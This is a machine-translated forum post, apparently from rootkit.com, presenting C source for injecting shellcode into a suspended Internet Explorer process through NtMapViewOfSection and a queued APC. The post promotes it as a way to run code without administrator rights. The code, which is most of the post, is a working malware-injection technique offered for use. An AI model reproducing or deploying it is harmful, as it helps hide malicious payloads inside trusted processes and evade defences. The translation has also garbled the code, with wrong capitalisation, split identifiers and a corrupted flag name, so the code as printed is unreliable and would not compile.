[Translation] new technology of remote code injection

Translated by: zshoucheng
Original Source: http://www.rootkit.com/newsread.php? Newsid= 715

New technology of remote code injection
By: yogle

I have developed a new possibility of code execution in remote processes, that is, using a non-document function to write code in the remote process address space, it also uses a new technology to execute it in remote processes. This technology works completely in user mode and does not require special conditions such as administrator permissions or other requirements. Let the source code describe everything: (I am sorry for my English level, I am from Germany)
Code:

# DEFINE _ win32_winnt 0x0400
# Include <windows. h>

Typedef long ntstatus, * pntstatus;
# Define nt_success (Status) (ntstatus) (Status)> = 0)

Typedef Enum _ section_inherit
...{
Viewshare = 1,
Viewunmap = 2
} Section_inherit;

Typedef ntstatus (_ stdcall * func_ntmapviewofsection) (handle, handle, lpvoid, ulong, size_t, large_integer *, size_t *, section_inherit, ulong, ulong );

Func_ntmapviewofsection ntmapviewofsection = NULL;


Lpvoid ntapi mymapviewoffileex (handle hprocess, handle hfilemappingobject, DWORD dwdesiredaccess, DWORD dwfileoffsethigh, DWORD dwfileoffsetlow,
DWORD dwnumberofbytestomap, lpvoid lpbaseaddress)
...{
Ntstatus status;
Large_integer sectionoffset;
Ulong viewsize;
Ulong protect;
Lpvoid viewbase;


// Conversion offset
Sectionoffset. lowpart = dwfileoffsetlow;
Sectionoffset. highpart = dwfileoffsethigh;

// Save the size and start address
Viewbase = lpbaseaddress;
Viewsize = dwnumberofbytestomap;

// The conversion flag is an NT protection attribute
If (dwdesiredaccess & file_map_write)
...{
Protect = page_readwrite;
}
Else if (dwdesiredaccess & file_map_read)
...{
Protect = page_readonly;
}
Else if (dwdesiredaccess & file_map_copy)
...{
Protect = page_writecopy;
}
Else
...{
Protect = page_noaccess;
}

// Ing area
Status = ntmapviewofsection (hfilemappingobject,
Hprocess,
& Viewbase,
0,
0,
& Sectionoffset,
& Viewsize,
Viewshare,
0,
Protect );
If (! Nt_success (Status ))
...{
// Failed
Return NULL;
}

// Return the start address.
Return viewbase;
}

Int winapi winmain (hinstance, hinstance, lpstr, INT)
...{
Hmodule hdll = loadlibrary ("NTDLL. dll ");

Ntmapviewofsection = (func_ntmapviewofsection) getprocaddress (hdll, "ntmapviewofsection ");

// Get shellcode, whatever you want to implement
Handle hfile = createfile ("C:/shellcode.txt", generic_read, 0, null, open_existing, file_attribute_normal, null );

Handle hmappedfile = createfilemapping (hfile, null, page_readonly, 0, 0, null );

// Start the target process
Startupinfo st;
Zeromemory (& St, sizeof (ST ));
St. cb = sizeof (startupinfo );

Process_information PI;
Zeromemory (& Pi, sizeof (PI ));

CreateProcess ("C:/programme/Internet Explorer/iexplore.exe", null, false, create_suincluded, null, null, & St, & PI );


// Inject shellcode into the target process address space
Lpvoid mappedfile = mymapviewoffileex (PI. hprocess, hmappedfile, file_map_read, 0, 0, 0, null );

// Create a new APC that can be restored in the target thread.
Queueuserapc (papcfunc) mappedfile, Pi. hthread, null );
Resumethread (PI. hthread );
Closehandle (hfile );
Closehandle (hmappedfile );
Closehandle (PI. hthread );
Closehandle (PI. hprocess );
Return 0;
}